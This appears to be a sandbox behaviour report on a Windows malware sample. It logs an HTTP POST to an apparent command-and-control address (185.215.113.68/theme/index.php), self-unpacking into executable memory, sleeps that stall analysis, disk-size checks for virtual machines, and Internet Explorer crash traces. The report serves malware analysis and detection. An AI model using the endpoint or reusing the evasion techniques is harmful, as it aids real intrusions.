Sends data using the HTTP POST Method (1 event)

request

POST http://185.215.113.68/theme/index.php

Allocates read-write-execute memory (usually to unpack itself) (50 out of 642 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory Jan. 20, 2024, 6:09 p.m.	process_identifier: 1884 region_size: 2936832 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02490000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 20, 2024, 6:09 p.m.	process_identifier: 1884 region_size: 16384 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02760000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 20, 2024, 6:09 p.m.	process_identifier: 1884 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00590000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 20, 2024, 6:09 p.m.	process_identifier: 1884 region_size: 81920 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02764000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 20, 2024, 6:09 p.m.	process_identifier: 1884 region_size: 147456 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02764000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 20, 2024, 6:09 p.m.	process_identifier: 1884 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02784000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 20, 2024, 6:09 p.m.	process_identifier: 1884 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02794000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 20, 2024, 6:09 p.m.	process_identifier: 1884 region_size: 81920 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02794000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 20, 2024, 6:09 p.m.	process_identifier: 1884 region_size: 16384 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027a4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 20, 2024, 6:09 p.m.	process_identifier: 1884 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027a8000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 20, 2024, 6:09 p.m.	process_identifier: 1884 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027a8000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 20, 2024, 6:09 p.m.	process_identifier: 1884 region_size: 507904 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027a8000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 20, 2024, 6:09 p.m.	process_identifier: 1884 region_size: 81920 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027a8000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 20, 2024, 6:09 p.m.	process_identifier: 1884 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027a8000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 20, 2024, 6:09 p.m.	process_identifier: 1884 region_size: 131072 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027a8000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 20, 2024, 6:10 p.m.	process_identifier: 2808 region_size: 2936832 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00910000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 20, 2024, 6:10 p.m.	process_identifier: 2808 region_size: 16384 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00e70000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 20, 2024, 6:10 p.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00640000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 20, 2024, 6:10 p.m.	process_identifier: 2808 region_size: 81920 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00e74000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 20, 2024, 6:10 p.m.	process_identifier: 2808 region_size: 147456 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00e74000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 20, 2024, 6:10 p.m.	process_identifier: 2808 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00e94000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 20, 2024, 6:10 p.m.	process_identifier: 2808 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00ea4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 20, 2024, 6:10 p.m.	process_identifier: 2808 region_size: 81920 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00ea4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 20, 2024, 6:10 p.m.	process_identifier: 2808 region_size: 16384 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00eb4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 20, 2024, 6:10 p.m.	process_identifier: 2808 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00eb8000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 20, 2024, 6:10 p.m.	process_identifier: 2808 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00eb8000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 20, 2024, 6:10 p.m.	process_identifier: 2808 region_size: 507904 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00eb8000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 20, 2024, 6:10 p.m.	process_identifier: 2808 region_size: 81920 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00eb8000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 20, 2024, 6:10 p.m.	process_identifier: 2808 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00eb8000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 20, 2024, 6:10 p.m.	process_identifier: 2808 region_size: 131072 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00eb8000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 20, 2024, 6:11 p.m.	process_identifier: 2808 region_size: 466944 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x031b0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 20, 2024, 6:11 p.m.	process_identifier: 2808 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00d90000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 20, 2024, 6:10 p.m.	process_identifier: 2884 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02cf0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 20, 2024, 6:10 p.m.	process_identifier: 2936 region_size: 856064 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02e70000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 20, 2024, 6:10 p.m.	process_identifier: 2936 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02f40000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 20, 2024, 6:10 p.m.	process_identifier: 2936 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7564f000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 20, 2024, 6:10 p.m.	process_identifier: 2936 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7564f000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 20, 2024, 6:10 p.m.	process_identifier: 2936 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7564f000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 20, 2024, 6:10 p.m.	process_identifier: 2936 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7564f000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 20, 2024, 6:10 p.m.	process_identifier: 2936 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7561c000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 20, 2024, 6:10 p.m.	process_identifier: 2936 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7563c000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 20, 2024, 6:10 p.m.	process_identifier: 2936 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7561c000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 20, 2024, 6:10 p.m.	process_identifier: 2936 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7563c000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 20, 2024, 6:10 p.m.	process_identifier: 2936 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73423000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 20, 2024, 6:10 p.m.	process_identifier: 2936 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x734c7000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 20, 2024, 6:10 p.m.	process_identifier: 2936 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x76af9000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 20, 2024, 6:10 p.m.	process_identifier: 2936 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x75ac2000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 20, 2024, 6:10 p.m.	process_identifier: 2936 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x75602000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 20, 2024, 6:10 p.m.	process_identifier: 2936 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7564f000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 20, 2024, 6:10 p.m.	process_identifier: 2936 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7564f000 process_handle: 0xffffffff	1

A process attempted to delay the analysis task. (3 events)

description	IEUpdater131.exe tried to sleep 421 seconds, actually delayed analysis time by 421 seconds
description	explorhe.exe tried to sleep 252 seconds, actually delayed analysis time by 252 seconds
description	zonak.exe tried to sleep 201 seconds, actually delayed analysis time by 201 seconds

Queries the disk size which could be used to detect virtual machine with small fixed size or dynamic allocation (19 events)

Time & API	Arguments	Status	Return
GetDiskFreeSpaceW Jan. 20, 2024, 6:10 p.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Jan. 20, 2024, 6:10 p.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Jan. 20, 2024, 6:10 p.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Jan. 20, 2024, 6:10 p.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Jan. 20, 2024, 6:10 p.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Jan. 20, 2024, 6:10 p.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Jan. 20, 2024, 6:10 p.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Jan. 20, 2024, 6:10 p.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Jan. 20, 2024, 6:10 p.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Jan. 20, 2024, 6:10 p.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Jan. 20, 2024, 6:10 p.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Jan. 20, 2024, 6:10 p.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Jan. 20, 2024, 6:10 p.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Jan. 20, 2024, 6:10 p.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Jan. 20, 2024, 6:10 p.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Jan. 20, 2024, 6:10 p.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Jan. 20, 2024, 6:10 p.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Jan. 20, 2024, 6:10 p.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW Jan. 20, 2024, 6:10 p.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1

An application raised an exception which may be indicative of an exploit crash (3 events)

Time & API	Arguments	Status	Return	Repeated
Application Crash	Process iexplore.exe with pid 2936 crashed
__exception__ Jan. 20, 2024, 6:11 p.m.	stacktrace: RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x754c374b CoReleaseServerProcess+0x73 OleSaveToStream-0xad ole32+0x64387 @ 0x75b94387 NdrpMemoryIncrement+0x3d1 NdrComplexStructMarshall-0x2f rpcrt4+0x1ef51 @ 0x754bef51 NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x754b6a9c NdrPointerMarshall+0xd6 NdrPointerBufferSize-0x10 rpcrt4+0x16b42 @ 0x754b6b42 NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x754b6a9c NdrConformantArrayFree+0x8c NdrOleFree-0xa rpcrt4+0x35c3a @ 0x754d5c3a NdrStubCall2+0x31d NdrUnmarshallBasetypeInline-0x23a rpcrt4+0xb06b8 @ 0x755506b8 WdtpInterfacePointer_UserUnmarshal+0x256f DllDebugObjectRPCHook-0x1e89 ole32+0x13d7e6 @ 0x75c6d7e6 WdtpInterfacePointer_UserUnmarshal+0x25ff DllDebugObjectRPCHook-0x1df9 ole32+0x13d876 @ 0x75c6d876 WdtpInterfacePointer_UserUnmarshal+0x2b59 DllDebugObjectRPCHook-0x189f ole32+0x13ddd0 @ 0x75c6ddd0 CoTaskMemFree+0x1b02 DcomChannelSetHResult-0x1c8 ole32+0x58a43 @ 0x75b88a43 CoTaskMemFree+0x19f7 DcomChannelSetHResult-0x2d3 ole32+0x58938 @ 0x75b88938 DcomChannelSetHResult+0x8ff CoGetObject-0x2183 ole32+0x5950a @ 0x75b8950a WdtpInterfacePointer_UserUnmarshal+0x2a56 DllDebugObjectRPCHook-0x19a2 ole32+0x13dccd @ 0x75c6dccd WdtpInterfacePointer_UserUnmarshal+0x28ca DllDebugObjectRPCHook-0x1b2e ole32+0x13db41 @ 0x75c6db41 WdtpInterfacePointer_UserUnmarshal+0x2f86 DllDebugObjectRPCHook-0x1472 ole32+0x13e1fd @ 0x75c6e1fd DcomChannelSetHResult+0x75c CoGetObject-0x2326 ole32+0x59367 @ 0x75b89367 DcomChannelSetHResult+0x71b CoGetObject-0x2367 ole32+0x59326 @ 0x75b89326 gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x755f62fa GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x755f6d3a CharPrevW+0x138 TranslateMessage-0x45 user32+0x177c4 @ 0x755f77c4 DispatchMessageW+0xf GetMessageW-0x58 user32+0x1788a @ 0x755f788a CoWaitForMultipleHandles+0x4311 CoRegisterSurrogateEx-0x2fe ole32+0x1a48b @ 0x75b4a48b CoWaitForMultipleHandles+0x23c1 CoRegisterSurrogateEx-0x224e ole32+0x1853b @ 0x75b4853b CoWaitForMultipleHandles+0x4332 CoRegisterSurrogateEx-0x2dd ole32+0x1a4ac @ 0x75b4a4ac CoGetTreatAsClass+0x2619 CoRegisterChannelHook-0x1269 ole32+0x2cd48 @ 0x75b5cd48 CoGetTreatAsClass+0x314b CoRegisterChannelHook-0x737 ole32+0x2d87a @ 0x75b5d87a BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0x80040155 exception.offset: 46887 exception.address: 0x7559b727 registers.esp: 107606260 registers.edi: 80984724 registers.eax: 107606260 registers.ebp: 107606340 registers.edx: 3539128 registers.ebx: 107606624 registers.esi: 2147746133 registers.ecx: 80873032	1	0	0
__exception__ Jan. 20, 2024, 6:11 p.m.	stacktrace: RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x754c374b DllDebugObjectRPCHook+0xb6 HACCEL_UserFree-0x57 ole32+0x13f725 @ 0x75c6f725 NdrPointerFree+0x16a IUnknown_Release_Proxy-0x5a rpcrt4+0x3414b @ 0x754d414b ObjectStublessClient25+0x65c CoImpersonateClient-0xbc ole32+0xfe14 @ 0x75b3fe14 StgGetIFillLockBytesOnFile+0x16ab5 WdtpInterfacePointer_UserSize-0xe21 ole32+0x13a338 @ 0x75c6a338 IsValidURL+0x4b8c MkParseDisplayNameEx-0x1c6a4 urlmon+0x4e99f @ 0x7532e99f IntlPercentEncodeNormalize+0x1ff8 CoInternetCombineIUri-0x940 urlmon+0x272ed @ 0x753072ed RegisterBindStatusCallback+0x40d9 CopyBindInfo-0xbe4 urlmon+0x1ab0d @ 0x752fab0d GetIUriPriv2+0x603 CoInternetIsFeatureEnabledForIUri-0xdf6 urlmon+0x1ea98 @ 0x752fea98 RegisterBindStatusCallback+0x1dc3 CopyBindInfo-0x2efa urlmon+0x187f7 @ 0x752f87f7 CopyStgMedium+0x286 FindMediaType-0x70d urlmon+0x1ba32 @ 0x752fba32 gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x755f62fa GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x755f6d3a CharPrevW+0x138 TranslateMessage-0x45 user32+0x177c4 @ 0x755f77c4 DispatchMessageA+0xf GetMessageA-0x9 user32+0x17bca @ 0x755f7bca CreateAsyncBindCtx+0xb2f URLDownloadToCacheFileW-0x54c urlmon+0x4516f @ 0x7532516f CreateAsyncBindCtx+0xa8e URLDownloadToCacheFileW-0x5ed urlmon+0x450ce @ 0x753250ce RegisterBindStatusCallback+0x36a4 CopyBindInfo-0x1619 urlmon+0x1a0d8 @ 0x752fa0d8 RegisterBindStatusCallback+0x3151 CopyBindInfo-0x1b6c urlmon+0x19b85 @ 0x752f9b85 RegisterBindStatusCallback+0x3074 CopyBindInfo-0x1c49 urlmon+0x19aa8 @ 0x752f9aa8 CreateAsyncBindCtx+0xccc URLDownloadToCacheFileW-0x3af urlmon+0x4530c @ 0x7532530c URLDownloadToCacheFileW+0xe5 CoInternetIsFeatureZoneElevationEnabled-0x2c18 urlmon+0x457a0 @ 0x753257a0 DllCanUnloadNow+0xcfc8 IEAssociateThreadWithTab-0x294dd ieframe+0x2540c @ 0x729b540c DllCanUnloadNow+0xce86 IEAssociateThreadWithTab-0x2961f ieframe+0x252ca @ 0x729b52ca CreateExtensionGuidEnumerator+0x5d622 SetQueryNetSessionCount-0x15f9a ieframe+0x100ea3 @ 0x72a90ea3 RtlGetUserInfoHeap+0x225 RtlQueueWorkItem-0x210 ntdll+0x67e96 @ 0x77907e96 TpCallbackIndependent+0x527 RtlIsCriticalSectionLockedByThread-0x240 ntdll+0x454f4 @ 0x778e54f4 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0x80040155 exception.offset: 46887 exception.address: 0x7559b727 registers.esp: 73128512 registers.edi: 1974991376 registers.eax: 73128512 registers.ebp: 73128592 registers.edx: 1 registers.ebx: 5373908 registers.esi: 2147746133 registers.ecx: 3862202768	1	0	0

Application Crash

Process iexplore.exe with pid 2936 crashed

Time & API

Arguments

Status

Return

Repeated

__exception__

Jan. 20, 2024, 6:11 p.m.

stacktrace:

RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x754c374b
CoReleaseServerProcess+0x73 OleSaveToStream-0xad ole32+0x64387 @ 0x75b94387
NdrpMemoryIncrement+0x3d1 NdrComplexStructMarshall-0x2f rpcrt4+0x1ef51 @ 0x754bef51
NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x754b6a9c
NdrPointerMarshall+0xd6 NdrPointerBufferSize-0x10 rpcrt4+0x16b42 @ 0x754b6b42
NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x754b6a9c
NdrConformantArrayFree+0x8c NdrOleFree-0xa rpcrt4+0x35c3a @ 0x754d5c3a
NdrStubCall2+0x31d NdrUnmarshallBasetypeInline-0x23a rpcrt4+0xb06b8 @ 0x755506b8
WdtpInterfacePointer_UserUnmarshal+0x256f DllDebugObjectRPCHook-0x1e89 ole32+0x13d7e6 @ 0x75c6d7e6
WdtpInterfacePointer_UserUnmarshal+0x25ff DllDebugObjectRPCHook-0x1df9 ole32+0x13d876 @ 0x75c6d876
WdtpInterfacePointer_UserUnmarshal+0x2b59 DllDebugObjectRPCHook-0x189f ole32+0x13ddd0 @ 0x75c6ddd0
CoTaskMemFree+0x1b02 DcomChannelSetHResult-0x1c8 ole32+0x58a43 @ 0x75b88a43
CoTaskMemFree+0x19f7 DcomChannelSetHResult-0x2d3 ole32+0x58938 @ 0x75b88938
DcomChannelSetHResult+0x8ff CoGetObject-0x2183 ole32+0x5950a @ 0x75b8950a
WdtpInterfacePointer_UserUnmarshal+0x2a56 DllDebugObjectRPCHook-0x19a2 ole32+0x13dccd @ 0x75c6dccd
